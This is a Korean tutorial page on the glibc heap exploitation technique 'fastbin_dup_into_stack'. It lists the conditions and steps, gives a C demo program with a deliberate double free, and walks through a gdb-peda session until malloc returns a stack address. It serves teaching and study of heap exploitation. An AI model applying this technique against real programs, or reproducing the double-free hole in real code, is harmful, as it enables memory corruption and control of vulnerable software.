Excuse the ads! We need some help to keep our site up.

List

Conditions

해당 기술은 다음과 같은 조건에서 동작합니다.
- 공격자에 의해 동일한 크기의 Fast chunk의 할당과 해제가 자유로워야 합니다.
- 공격자에 의해 해제된 Fast chunk를 한번더 해제 할 수 있어야 합니다.(Double free bug)
- 공격자에 의해 할당된 Fast chunk 영역에 값을 저장 할 수 있어야 합니다.
- 할당 받고자 하는 Stack영역에 해제된 Fast chunk의 크기 값이 저장되어 있어야 합니다.

Exploit plan

다음과 같은 방법으로 공격할 수 있습니다.
- 동일한 크기의 Fast chunk를 3개 생성합니다.
- 첫번째 Fast chunk를 해제합니다.
- 두번째 Fast chunk를 해제합니다.
- 해제된 첫번째 Fast chunk를 다시 한번 해제합니다.
- 동일한 크기의 Fast chunk를 2개 재할당합니다.
- 재할당 받은 Chunk 중 첫번째 Chunk 영역에 "Stack 영역의 주소 값 - prev_size 공간(0x8)"을 저장합니다.
  - Stack 영역에는 해제된 청크와 동일한 크기의 값이 저장되어 있어야 합니다.
- 동일한 크기의 Fast chunk를 할당합니다.
- 또 다시 Fast chunk를 할당 합니다.
  - 할당된 영역은 "Stack 영역의 주소 값 + 0x8" 영역입니다.

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>

int main()
{
        long stack_var = 0x0;

        printf("Stack_var : %p\n",&stack_var);
        char *buf1 = malloc(112);
        char *buf2 = malloc(112);
        char *buf3 = malloc(112);

        free(buf1);
        free(buf2);
        free(buf1);

        char *buf4 = malloc(112);
        char *buf5 = malloc(112);

        printf("buf4 size : %ld\n",sizeof(buf4));
        scanf("%ld",&stack_var);
        scanf("%8s",buf4);

        char *buf6 = malloc(112);
        char *buf7 = malloc(112);
        scanf("%100s",buf7);
}

Exploit flow

TechNote > fastbin_dup_into_stack[Korean] > 1501832768956.jpg

Debugging

다음과 같이 Break point를 설정합니다.
- 0x400684 : 1번재 free() 함수 호출
- 0x400695 : 2번재 free() 함수 호출 후
- 0x4006a1 : 3번재 free() 함수 호출 후
- 0x4006ab : 4번째 malloc() 함수 호출
- 0x4006b9 : 5번째 malloc() 함수 호출
- 0x4006f8 : scanf(buf4) 함수 호출
- 0x400707 : 6번째 malloc() 함수 호출
- 0x400715 : 7번째 malloc() 함수 호출

gdb-peda$ b *0x0000000000400684
Breakpoint 1 at 0x400684
gdb-peda$ b *0x0000000000400695
Breakpoint 2 at 0x400695
gdb-peda$ b *0x00000000004006a1
Breakpoint 3 at 0x4006a1
gdb-peda$ b *0x00000000004006ab
Breakpoint 4 at 0x4006ab
gdb-peda$ b *0x00000000004006b9
Breakpoint 5 at 0x4006b9
gdb-peda$ b *0x00000000004006f8
Breakpoint 6 at 0x4006f8
gdb-peda$ b *0x0000000000400707
Breakpoint 7 at 0x400707
gdb-peda$ b *0x0000000000400715
Breakpoint 8 at 0x400715
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/def/fastbin_dup_into_stack 
Stack_var : 0x7fffffffe220

다음과 같은 Heap 구조를 가집니다.
- 첫번재 Heap : 0x602010
- 두번재 Heap : 0x602090
- 세번재 Heap : 0x602110
첫번재 Heap 영역이 해제되어 fastbinsY[6]에 0x602000이 저장되었습니다.

Breakpoint 1, 0x0000000000400684 in main ()
gdb-peda$ p main_arena.fastbinsY 
$1 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}

gdb-peda$ x/50gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000020e81

gdb-peda$ ni
0x0000000000400689 in main ()
gdb-peda$ p main_arena.fastbinsY 
$2 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602000, 0x0, 0x0, 0x0}
gdb-peda$ x/50gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000020e81
gdb-peda$

다음과 같이 해제된 두번재 Heap 영역의 free chunk의 주소가 fastbinsY[6]이 등록됩니다.
- 생성된 free chunk의 fd영역에 첫번째 free chunk 주소(0x602000)가 저장됩니다.

gdb-peda$ c
Continuing.
Breakpoint 2, 0x0000000000400695 in main ()
gdb-peda$ p main_arena.fastbinsY 
$3 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602080, 0x0, 0x0, 0x0}
gdb-peda$ x/50gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000602000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000020e81
gdb-peda$

다음과 같이 해제된 첫번째 Heap 영역을 해제합니다.
- 해당 heap의 free chunk 주소가 fastbinsY[6]에 저장됩니다.
- fd영역에 2번째 free chunk주소(0x602080)가 저장됩니다.

gdb-peda$ c
Continuing.

Breakpoint 3, 0x00000000004006a1 in main ()
gdb-peda$ p main_arena.fastbinsY 
$4 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602000, 0x0, 0x0, 0x0}
gdb-peda$ x/50gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000602080	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000602000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000020e81
gdb-peda$

다음과 같이 해제된 Heap 과 동일한 크기의 Heap을 생성합니다.
- 4번재 Heap: 0x602010
- 5번재 Heap: 0x602090
fastbinsY의 변화
- 0x602000 → 0x602080 → 0x602000 → 0x602080
- malloc()함수는 fastbinsY에 동일한 크기의 free chunk가 존재하기 때문에 fastbinsY에 등록되어 있는 heap 영역을 재할당 합니다.
이러한 현상이 발생하는 이유는 다음과 같습니다.
- fastbins은 free chunk를 Single list로 관리하고 있습니다.
  - 동일한 크기의 fast chunk가 여러 개가 해제되면, chunk header의 fd 영역을 이용해 관리합니다.
- 즉, 해당 현상이 발생하는 이유는 Double free로 인해 buf1과 buf2 free chunk의 fd 값이 상대 chunk를 가리키고 있기 때문입니다.
할당 받은 Heap 영역들을 이용해 free chunk의 fd 값을 변경할 수 있습니다.

gdb-peda$ c
Continuing.

Breakpoint 4, 0x00000000004006ab in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ p main_arena.fastbinsY 
$5 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602080, 0x0, 0x0, 0x0}

gdb-peda$ c
Continuing.

Breakpoint 5, 0x00000000004006b9 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ p main_arena.fastbinsY 
$6 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602000, 0x0, 0x0, 0x0}

다음과 같이 fd영역의 값을 변경할 수 있습니다.
- 공격대상이 될 영역에 해제된 Heap과 같은 크기 값(0x80)이 저장되어 있어야 합니다.
- 할당받은 4번째 Heap영역에 'A'*8개를 입력해서, 첫번째 free chunk의 fd값이 변경되었습니다.
- set 명령어를 이용해 fd영역에 공격대상 주소 값을 저장합니다.
  - stack_var(0x7fffffffe220) - prev_size(0x8) = 0x7fffffffe218
fd영역의 값 변경으로 fastbins의 Single list에 변화가 발생합니다.
- 0x602000 → 0x7fffffffe218 → 0x602010 → 0x0
- 0x7fffffffe218 영역이 fastbinsY에 등록되어 0x602000의 다음 free chunk로 인식됩니다.
- 0x7fffffffe218 + 0x10 영역이 0x7fffffffe218의 fd영역으로 인식됩니다.
  - 0x7fffffffe218 + 0x10 영역에 저장된 값은 0x602010입니다.
- 0x602010영역 또한 0x7fffffffe218과 동일하게 다음 free chunk로 인식됩니다.
  - 0x602010 + 0x10 영역에 저장된 값은 0x0입니다.

gdb-peda$ c
Continuing.
buf4 size : 8
128

Breakpoint 6, 0x00000000004006f8 in main ()
gdb-peda$ x/gx 0x7fffffffe220
0x7fffffffe220:	0x0000000000000080
gdb-peda$ ni
AAAAAAAA

0x00000000004006fd in main ()
gdb-peda$ x/4gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x4141414141414141	0x0000000000000000

gdb-peda$ set *0x602010 = 0x7fffffffe220 - 0x8
gdb-peda$ set *0x602014 = 0x7fff
gdb-peda$ x/gx 0x602010
0x602010:	0x00007fffffffe218
gdb-peda$ x/4gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x00007fffffffe218	0x0000000000000000

다음과 같이 Stack 영역을 할당 받을 수 있습니다.
- 6번째 Heap : 0x602010
- 7번째 Heap : 0x7fffffffe228

gdb-peda$ c
Continuing.

Breakpoint 7, 0x0000000000400707 in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ p main_arena.fastbinsY 
$7 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7fffffffe218, 0x0, 0x0, 0x0}

gdb-peda$ c
Continuing.

Breakpoint 8, 0x0000000000400715 in main ()
gdb-peda$ i r rax
rax            0x7fffffffe228	0x7fffffffe228
gdb-peda$ p main_arena.fastbinsY 
$8 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602010, 0x0, 0x0, 0x0}
gdb-peda$ x/20gx 0x7fffffffe228 - 0x10
0x7fffffffe218:	0x0000000000400715	0x0000000000000080
0x7fffffffe228:	0x0000000000602010	0x0000000000602090
0x7fffffffe238:	0x0000000000602110	0x0000000000602010
0x7fffffffe248:	0x0000000000602090	0x0000000000602010
0x7fffffffe258:	0x0000000000000000	0x0000000000000000
0x7fffffffe268:	0x00007ffff7a32f45	0x0000000000000000
0x7fffffffe278:	0x00007fffffffe358	0x0000000100000000
0x7fffffffe288:	0x000000000040062d	0x0000000000000000
0x7fffffffe298:	0x4b0a417085002861	0x0000000000400540
0x7fffffffe2a8:	0x00007fffffffe350	0x0000000000000000
gdb-peda$

Related information

https://github.com/shellphish/how2heap